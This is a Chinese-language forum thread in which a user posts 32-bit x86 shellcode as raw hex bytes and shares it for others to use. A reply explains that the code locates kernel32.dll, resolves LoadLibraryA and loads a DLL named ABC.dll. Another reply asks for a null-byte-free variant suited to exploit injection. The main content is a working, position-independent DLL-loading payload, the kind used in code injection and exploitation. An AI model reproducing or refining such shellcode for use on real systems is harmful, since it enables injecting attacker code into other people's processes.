smny 发表于 2018-5-16 15:46:43

SHELLCODE LoadLibraryA 32位版本

本帖最后由 smny 于 2018-5-16 18:52 编辑



60 64 A1 30 00 00 00 8B 40 0C 8B 70 1C AD 8B 40 08 8B E8 8B 45 3C 8B 54 28 78 03 D5 8B 4A 18 8B
5A 20 03 DD 49 8B 34 8B 03 F5 B8 4C 6F 61 64 39 06 75 F1 B8 4C 69 62 72 39 46 04 75 E7 B8 61 72
79 41 39 46 08 75 DD 8B 5A 24 03 DD 66 8B 0C 4B 8B 5A 1C 03 DD 8B 04 8B 03 C5 E8 00 00 00 00 5A
83 C2 09 52 FF D0 61 C3 41 42 43 2E 64 6C 6C 00

贴汇编代码反而不直观了,好代码不私藏,贴出来分享一下~~~

small-q 发表于 2018-5-16 18:46:52

这么多0,大表哥,把无0的版本放出来吧

smny 发表于 2018-5-16 18:52:53

small-q 发表于 2018-5-16 18:46
这么多0,大表哥,把无0的版本放出来吧

贴图了,看看哪个0字节可以去掉的

smallhorse 发表于 2018-5-17 07:58:39

只看到个啊波词的屌的路过!!!

ydxydx 发表于 2018-5-17 14:04:49

不就是找到kernel32.dll的基地址,再找到LoadLibraryA函数的入口地址,再调用它,加载ABC.dll吗?还搞得那么神秘。

lengbingling 发表于 2018-5-18 14:51:26

SHELLCODE LoadLibraryA 32位版本
页: [1]
查看完整版本: SHELLCODE LoadLibraryA 32位版本